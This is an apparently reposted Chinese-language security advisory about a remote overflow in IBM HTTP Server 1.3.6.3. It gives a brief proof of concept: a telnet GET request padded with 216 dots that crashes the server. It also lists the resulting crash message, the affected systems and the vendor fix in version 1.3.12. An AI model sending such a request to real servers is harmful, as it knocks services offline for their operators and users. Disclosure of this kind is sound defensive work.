IBM HTTP Server 远程溢出漏洞

发布时间:2022-04-17 发布网站:脚本宝典
脚本宝典收集整理的这篇文章主要介绍了IBM HTTP Server 远程溢出漏洞脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。
涉及程序:
GET

描述:
通过提交超长的GET请求导致IBM HTTP Server远程溢出


详细:
IBM 的 HTTP 服务器是一个 web 服务器。在 Windows NT 使用的版本中存在拒绝服务的漏洞。

如果提交一个超过219个字符的 GET 请求,将导致服务器停止响应,并报错。要恢复服务正常工作需要重新启动应用程序。成功的利用该漏洞,攻击者可在受害的主机上执行任何代码。(但这还未得到完全证实。)


以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


$ telnet target 80
GET /......(216个".")aaa HTTP/1.0

则系统会报告下列错误信息:
***STOP:0x0000001e(0X00000005,0X804B3A51,0X00000000,0X00000000)KMODE_EXCEPTI
ON_NOT_HANDLED.
***Address 804B3A51 base at 80400000,Datastamp 384D9B17-ntoskrnl.exe
注意:目标主机运行在Windows 2000下。

受影响的系统
IBM HTTP Server 1.3.6.3
- TurboLinux Turbo Linux 3.0.1
- Sun solaris 2.6
- S.u.S.E. Linux 6.1
- S.u.S.E. Linux 6.0
- redhat Linux 6.0 sparc
- RedHat Linux 5.2 sparc
- Microsoft Windows NT 4.0
- IBM aiX 4.2.1
- Caldera OPEnLinux 2.2

解决方案
IBM 已经在 1.3.12 版本中解决了此问题,下载地址:
http://www-4.ibm.COM/Software/webservers/httpservers/download.htML

脚本宝典总结

以上是脚本宝典为你收集整理的IBM HTTP Server 远程溢出漏洞全部内容,希望文章能够帮你解决IBM HTTP Server 远程溢出漏洞所遇到的问题。

如果觉得脚本宝典网站内容还不错,欢迎将脚本宝典推荐好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。
标签: